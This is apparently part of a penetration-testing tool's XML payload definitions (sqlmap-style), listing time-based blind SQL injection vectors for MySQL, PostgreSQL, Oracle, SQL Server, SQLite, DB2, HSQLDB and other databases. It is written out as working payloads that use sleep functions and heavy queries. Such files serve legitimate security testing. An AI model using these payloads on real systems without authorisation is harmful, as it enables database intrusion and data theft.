COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>1767</request>1768<response>1769<time>[DELAYED]</time>1770</response>1771<details>1772<dbms>Microsoft SQL Server</dbms>1773<dbms>Sybase</dbms>1774</details>1775</test>17761777<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->1778<test>1779<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>1780<stype>5</stype>1781<level>3</level>1782<risk>1</risk>1783<clause>1,3,9</clause>1784<where>3</where>1785<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>1786<request>1787<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>1788</request>1789<response>1790<time>[SLEEPTIME]</time>1791</response>1792<details>1793<dbms>Oracle</dbms>1794</details>1795</test>17961797<test>1798<title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>1799<stype>5</stype>1800<level>3</level>1801<risk>1</risk>1802<clause>1,3,9</clause>1803<where>3</where>1804<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>1805<request>1806<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>1807</request>1808<response>1809<time>[SLEEPTIME]</time>1810</response>1811<details>1812<dbms>Oracle</dbms>1813</details>1814</test>18151816<test>1817<title>Oracle time-based blind - Parameter replace (heavy queries)</title>1818<stype>5</stype>1819<level>4</level>1820<risk>2</risk>1821<clause>1,3,9</clause>1822<where>3</where>1823<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>1824<request>1825<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>1826</request>1827<response>1828<time>[DELAYED]</time>1829</response>1830<details>1831<dbms>Oracle</dbms>1832</details>1833</test>18341835<test>1836<title>SQLite > 2.0 time-based blind - Parameter replace (heavy query)</title>1837<stype>5</stype>1838<level>4</level>1839<risk>2</risk>1840<clause>1,2,3,9</clause>1841<where>3</where>1842<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>1843<request>1844<payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>1845</request>1846<response>1847<time>[DELAYED]</time>1848</response>1849<details>1850<dbms>SQLite</dbms>1851<dbms_version>> 2.0</dbms_version>1852</details>1853</test>18541855<test>1856<title>Firebird time-based blind - Parameter replace (heavy query)</title>1857<stype>5</stype>1858<level>5</level>1859<risk>2</risk>1860<clause>1,2,3,9</clause>1861<where>3</where>1862<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1863<request>1864<payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1865</request>1866<response>1867<time>[DELAYED]</time>1868</response>1869<details>1870<dbms>Firebird</dbms>1871<dbms_version>>= 2.0</dbms_version>1872</details>1873</test>18741875<test>1876<title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>1877<stype>5</stype>1878<level>5</level>1879<risk>2</risk>1880<clause>1,3,9</clause>1881<where>3</where>1882<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1883<request>1884<payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1885</request>1886<response>1887<time>[DELAYED]</time>1888</response>1889<details>1890<dbms>SAP MaxDB</dbms>1891</details>1892</test>18931894<test>1895<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>1896<stype>5</stype>1897<level>5</level>1898<risk>2</risk>1899<clause>1,2,3,9</clause>1900<where>3</where>1901<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>1902<request>1903<payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>1904</request>1905<response>1906<time>[DELAYED]</time>1907</response>1908<details>1909<dbms>IBM DB2</dbms>1910</details>1911</test>19121913<!-- Untested -->1914<test>1915<title>HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)</title>1916<stype>5</stype>1917<level>4</level>1918<risk>2</risk>1919<clause>1,2,3,9</clause>1920<where>3</where>1921<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>1922<request>1923<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>1924</request>1925<response>1926<time>[SLEEPTIME]</time>1927</response>1928<details>1929<dbms>HSQLDB</dbms>1930<dbms_version>>= 1.7.2</dbms_version>1931</details>1932</test>19331934<test>1935<title>HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)</title>1936<stype>5</stype>1937<level>5</level>1938<risk>2</risk>1939<clause>1,2,3,9</clause>1940<where>3</where>1941<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>1942<request>1943<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>1944</request>1945<response>1946<time>[SLEEPTIME]</time>1947</response>1948<details>1949<dbms>HSQLDB</dbms>1950<dbms_version>> 2.0</dbms_version>1951</details>1952</test>19531954<test>1955<title>Informix time-based blind - Parameter replace (heavy query)</title>1956<stype>5</stype>1957<level>4</level>1958<risk>2</risk>1959<clause>1,2,3,9</clause>1960<where>3</where>1961<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1962<request>1963<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1964</request>1965<response>1966<time>[DELAYED]</time>1967</response>1968<details>1969<dbms>Informix</dbms>1970</details>1971</test>1972<!-- End of time-based boolean tests - Parameter replace -->19731974<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->1975<test>1976<title>MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>1977<stype>5</stype>1978<level>3</level>1979<risk>1</risk>1980<clause>2,3</clause>1981<where>1</where>1982<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>1983<request>1984<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>1985</request>1986<response>1987<time>[SLEEPTIME]</time>1988</response>1989<details>1990<dbms>MySQL</dbms>1991<dbms_version>>= 5.0.12</dbms_version>1992</details>1993</test>19941995<test>1996<title>MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>1997<stype>5</stype>1998<level>4</level>1999<risk>2</risk>2000<clause>2,3</clause>2001<where>1</where>2002<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>2003<request>2004<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>2005</request>2006<response>2007<time>[DELAYED]</time>2008</response>2009<details>2010<dbms>MySQL</dbms>2011<dbms_version>< 5.0.12</dbms_version>2012</details>2013</test>20142015<test>2016<title>PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause</title>2017<stype>5</stype>2018<level>3</level>2019<risk>1</risk>2020<clause>2,3</clause>2021<where>1</where>2022<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>2023<request>2024<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>2025</request>2026<response>2027<time>[SLEEPTIME]</time>2028</response>2029<details>2030<dbms>PostgreSQL</dbms>2031<dbms_version>> 8.1</dbms_version>2032</details>2033</test>20342035<test>2036<title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2037<stype>5</stype>2038<level>4</level>2039<risk>2</risk>2040<clause>2,3</clause>2041<where>1</where>2042<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>2043<request>2044<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>2045</request>2046<response>2047<time>[DELAYED]</time>2048</response>2049<details>2050<dbms>PostgreSQL</dbms>2051</details>2052</test>20532054<test>2055<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>2056<stype>5</stype>2057<level>4</level>2058<risk>2</risk>2059<clause>2,3</clause>2060<where>1</where>2061<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>2062<request>2063<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>2064</request>2065<response>2066<time>[DELAYED]</time>2067</response>2068<details>2069<dbms>Microsoft SQL Server</dbms>2070<dbms>Sybase</dbms>2071</details>2072</test>20732074<test>2075<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>2076<stype>5</stype>2077<level>3</level>2078<risk>1</risk>2079<clause>2,3</clause>2080<where>1</where>2081<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>2082<request>2083<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>2084</request>2085<response>2086<time>[SLEEPTIME]</time>2087</response>2088<details>2089<dbms>Oracle</dbms>2090</details>2091</test>20922093<test>2094<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>2095<stype>5</stype>2096<level>3</level>2097<risk>1</risk>2098<clause>2,3</clause>2099<where>1</where>2100<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>2101<request>2102<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>2103</request>2104<response>2105<time>[SLEEPTIME]</time>2106</response>2107<details>2108<dbms>Oracle</dbms>2109</details>2110</test>21112112<test>2113<title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2114<stype>5</stype>2115<level>4</level>2116<risk>2</risk>2117<clause>2,3</clause>2118<where>1</where>2119<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>2120<request>2121<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>2122</request>2123<response>2124<time>[DELAYED]</time>2125</response>2126<details>2127<dbms>Oracle</dbms>2128</details>2129</test>21302131<test>2132<title>HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2133<stype>5</stype>2134<level>4</level>2135<risk>2</risk>2136<clause>2,3</clause>2137<where>1</where>2138<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>2139<request>2140<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>2141<comment>--</comment>2142</request>2143<response>2144<time>[DELAYED]</time>2145</response>2146<details>2147<dbms>HSQLDB</dbms>2148<dbms_version>>= 1.7.2</dbms_version>2149</details>2150</test>21512152<test>2153<title>HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2154<stype>5</stype>2155<level>4</level>2156<risk>2</risk>2157<clause>2,3</clause>2158<where>1</where>2159<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>2160<request>2161<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>2162</request>2163<response>2164<time>[DELAYED]</time>2165</response>2166<details>2167<dbms>HSQLDB</dbms>2168<dbms_version>> 2.0</dbms_version>2169</details>2170</test>21712172<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->2173</root>217421752176